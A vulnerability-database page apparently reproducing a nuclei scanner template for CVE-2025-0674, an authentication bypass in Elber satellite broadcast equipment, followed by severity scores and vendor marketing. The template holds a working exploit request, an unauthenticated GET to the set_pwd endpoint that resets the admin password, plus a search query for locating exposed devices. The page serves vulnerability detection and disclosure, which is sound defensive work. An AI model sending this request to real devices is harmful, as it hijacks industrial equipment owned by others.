Lucene search
K

Elber ESE DVB-S/S2 - Authentication Bypass

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Multiple Elber products face critical authentication bypass, enabling unauthorized password changes.

Related
Refs
Code
id: CVE-2025-0674

info:
  name: Elber ESE DVB-S/S2 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    Multiple Elber products are affected by an authentication bypass vulnerability which allows unauthorized access to the password management functionality. Attackers can exploit this issue by manipulating the endpoint to overwrite any user's password within the system.
  remediation: |
    Apply security patches from Elber or restrict access to the password management endpoints to authorized networks only.
  impact: |
    This grants them unauthorized administrative access to protected areas of the application, compromising the device's system security.
  reference:
    - https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-03
    - https://github.com/eeeeeeeeee-code/POC/blob/main/wpoc/wayber/Elber-Wayber%E6%A8%A1%E6%8B%9F%E6%95%B0%E5%AD%97%E9%9F%B3%E9%A2%91%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md?plain=1
    - https://nvd.nist.gov/vuln/detail/CVE-2025-0674
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-0674
    cwe-id: CWE-288
    epss-score: 0.03523
    epss-percentile: 0.87823
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="Elber Satellite Equipment" || body="www.elber.it"
  tags: cve,cve2025,auth-bypass,elber,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /modules/pwd.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "Manage system Password"
        internal: true

  - raw:
      - |
        GET /json_data/set_pwd?lev=2&pass=admin1234 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "Apply successfully"
# digest: 4a0a00473045022037830ac7122fc7808361b79af02f4b4145668bfbcceafd9ecc674efaecf442e2022100adc6a82b0fdae194ce9b857b6966ea22c4d81b9507fc84e3fb68fb1f555ef7db:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 49.3
CVSS 3.19.8
EPSS0.03523
SSVC
19